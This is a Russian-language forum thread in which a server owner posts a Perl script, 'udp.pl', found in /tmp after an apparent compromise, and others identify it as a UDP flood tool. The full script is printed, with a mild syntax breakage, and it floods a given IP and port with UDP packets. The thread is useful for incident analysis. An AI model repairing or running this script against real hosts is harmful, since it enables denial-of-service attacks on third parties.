Может ли этот скрипт быть использован для ДДОСа?

mikestat

У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
Спецы перла, скажите для чего он используется?
Вот содержимое:

bash-3.00$ cat /tmp/udp.pl

#!/usr/bin/perl

###################################################

################ UDP ATACK FLOOD ##################

###################################################



use Socket;



$ARGC=@ARGV;



if ($ARGC !=3) {

 printf " \n";

 printf "-------UDP ATACK FLOOD-------\n";

 printf "EX: $0 <ip> <port> <time>\n";

 printf "-----------------------------\n";

 printf " \n";

 exit(1);

}



my ($ip,$port,$size,$time);

 $ip=$ARGV[0];

 $port=$ARGV[1];

 $time=$ARGV[2];



socket(crazy, PF_INET, SOCK_DGRAM, 17);

    $iaddr = inet_aton("$ip");



printf " \n";

printf "-------UDP ATACK FLOOD-------\n";

printf "Seding flood: $ip:$port\n";

printf "-----------------------------\n";

printf " \n";



if ($ARGV[1] ==0 && $ARGV[2] ==0) {

 goto randpackets;

}

if ($ARGV[1] !=0 && $ARGV[2] !=0) {

 system("(sleep $time;killall -9 udp) &");

 goto packets;

}

if ($ARGV[1] !=0 && $ARGV[2] ==0) {

 goto packets;

}

if ($ARGV[1] ==0 && $ARGV[2] !=0) {

 system("(sleep $time;killall -9 udp) &");

 goto randpackets;

}



packets:

for (;;) {

 $size=$rand x $rand x $rand;

 send(crazy, 0, $size, sockaddr_in($port, $iaddr;

}



randpackets:

for (;;) {

 $size=$rand x $rand x $rand;

 $port=int(rand 65000) +1;

 send(crazy, 0, $size, sockaddr_in($port, $iaddr;

  

mikestat

был запущен от пользователя apache с параметрами 88.158.99.2 80 0

sergey_m

Э, чувак. Это уже не твой сервер.

mikestat

Да блин.. Я уже понял что поломали. Вопрос как? ограничить доступ к папке тмп? Можно ли как-нить прикрыть доступ к файлам перл от конкретного пользователя? Т.к. у меня перл не используется нигде на сервере.
Все-таки это был ДДОС?

evgen5555

Я понимаю, конечно, что ДДОС - модное слово, но давай лучше употреблять термины к месту. Перловый скрипт зачем-то флудит UDP-порт рандомными пакетами, вот и всё.

Ober

Это юмор в девелопменте или что?

dgaf

$size=$rand x $rand x $rand;

что это?

sergey_m

Да блин.. Я уже понял что поломали. Вопрос как? ограничить доступ к папке тмп? Можно ли как-нить прикрыть доступ к файлам перл от конкретного пользователя? Т.к. у меня перл не используется нигде на сервере.

Надо не бороться со следствием, а заняться поиском причины.

Все-таки это был ДДОС?

На счёт первой буквы Д нет уверенности, а вот последние три буквы верны.